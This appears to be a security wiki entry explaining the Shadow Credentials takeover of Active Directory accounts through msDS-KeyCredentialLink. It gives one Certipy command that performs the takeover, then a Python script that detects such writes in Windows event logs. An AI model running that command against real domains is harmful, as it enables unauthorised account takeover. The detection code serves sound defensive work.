Shadow Credentials
Shadow Credentials is an attack technique for taking over an Active Directory user or computer account by tampering with the msDS-KeyCredentialLink attribute of the target object.
- [kerberos-abuse](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials)
Exploit
If an attacker can modify the msDS-KeyCredentialLink attribute of the target object (a user or computer account)
and append alternate credentials to it in the form of certificates, the attacker takes over the account in AD.
Using Certipy
# -k: Use Kerberos authentication
certipy shadow auto -account "targetuser" -u "username@example.local" -p 'password' -dc-ip 10.0.0.1 -target dc.example.local -k
Using Whisker
Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute.
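Both tools depend on a write to msDS-KeyCredentialLink, so that write is the event to monitor. The following is an added detection example, not code from the original page or from either tool: it flags Security event 5136 additions to the attribute by writers outside an allowlist and raises severity when a certificate-based (PKINIT) 4768 TGT request for the same account follows. The JSON-lines export format, account names, allowlist and one-hour window are constructed assumptions.

```python
import json
from datetime import datetime, timedelta

KEY_ATTR = "msds-keycredentiallink"
VALUE_ADDED = "%%14674"            # 5136 OperationType token: "Value Added"
PKINIT = "16"                      # 4768 PreAuthType for certificate pre-auth
WINDOW = timedelta(hours=1)        # assumption: correlation window, tune locally
EXPECTED_WRITERS = {"svc-adsync"}  # hypothetical allowlist of legitimate writers

# Constructed sample events, one JSON object per line. Field names follow the
# Windows Security log; the export format itself is an assumption.
SAMPLE_LOG = """\
{"EventID": 5136, "TimeCreated": "2024-05-01T10:00:00", "SubjectUserName": "svc-adsync", "ObjectDN": "CN=alice,CN=Users,DC=example,DC=local", "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"}
{"EventID": 5136, "TimeCreated": "2024-05-01T11:02:10", "SubjectUserName": "username", "ObjectDN": "CN=targetuser,CN=Users,DC=example,DC=local", "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"}
{"EventID": 4768, "TimeCreated": "2024-05-01T11:02:25", "TargetUserName": "targetuser", "PreAuthType": "16"}
{"EventID": 5136, "TimeCreated": "2024-05-01T12:30:00", "SubjectUserName": "helpdesk1", "ObjectDN": "CN=bob,CN=Users,DC=example,DC=local", "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"}
"""

def cn_of(dn):
    """Leftmost RDN value of a DN, lowercased (assumes CN == sAMAccountName)."""
    return dn.split(",", 1)[0].partition("=")[2].lower()

def find_key_writes(log_text):
    """Return alerts for unexpected msDS-KeyCredentialLink additions."""
    events = [json.loads(l) for l in log_text.splitlines() if l.strip()]
    for ev in events:
        ev["ts"] = datetime.fromisoformat(ev["TimeCreated"])
    alerts = []
    for ev in events:
        if (ev["EventID"] != 5136
                or ev.get("AttributeLDAPDisplayName", "").lower() != KEY_ATTR
                or ev.get("OperationType") != VALUE_ADDED
                or ev.get("SubjectUserName", "").lower() in EXPECTED_WRITERS):
            continue
        target = cn_of(ev["ObjectDN"])
        # Raise severity when the target then authenticates with a certificate.
        followed = any(
            e["EventID"] == 4768 and e.get("PreAuthType") == PKINIT
            and e.get("TargetUserName", "").lower().rstrip("$") == target
            and timedelta(0) <= e["ts"] - ev["ts"] <= WINDOW
            for e in events)
        alerts.append({"writer": ev["SubjectUserName"], "target": target,
                       "severity": "high" if followed else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in find_key_writes(SAMPLE_LOG):
        print(alert)
```

Event 5136 is only logged when "Audit Directory Service Changes" is enabled and a SACL on the monitored objects covers writes to the attribute.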